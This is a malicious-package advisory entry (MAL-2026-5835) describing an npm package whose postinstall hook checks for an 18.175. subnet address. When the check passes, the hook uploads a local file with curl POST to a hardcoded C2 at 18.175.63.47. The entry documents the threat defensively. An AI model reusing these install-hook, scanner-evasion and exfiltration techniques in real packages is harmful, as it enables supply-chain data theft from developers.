MAL-2026-5835

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9bbde4e4075983db0c5aba255bc29f84fb2536681b13e8289412cce5c3ee7a2e) On `npm install`, the package's `postinstall` hook runs `sec_check.js`, which enumerates the host's network interfaces and proceeds only if an IPv4 address begins with `18.175.` — a subnet-based targeting gate that hides the behavior on most developer/CI machines. When the gate passes, the script reads `<INIT_CWD>/myfile.txt` from the installer's working directory and uses `curl -X POST` to upload its contents to a hardcoded plaintext C2 at `http://18.175.63.47:8080/collect`. The combination of a lifecycle-script auto-execute path, network-identity targeting to evade scanners, hardcoded bare-IP exfiltration endpoint, and reading installer-side files matches a targeted supply-chain attack against a specific environment (likely an AWS/lab subnet).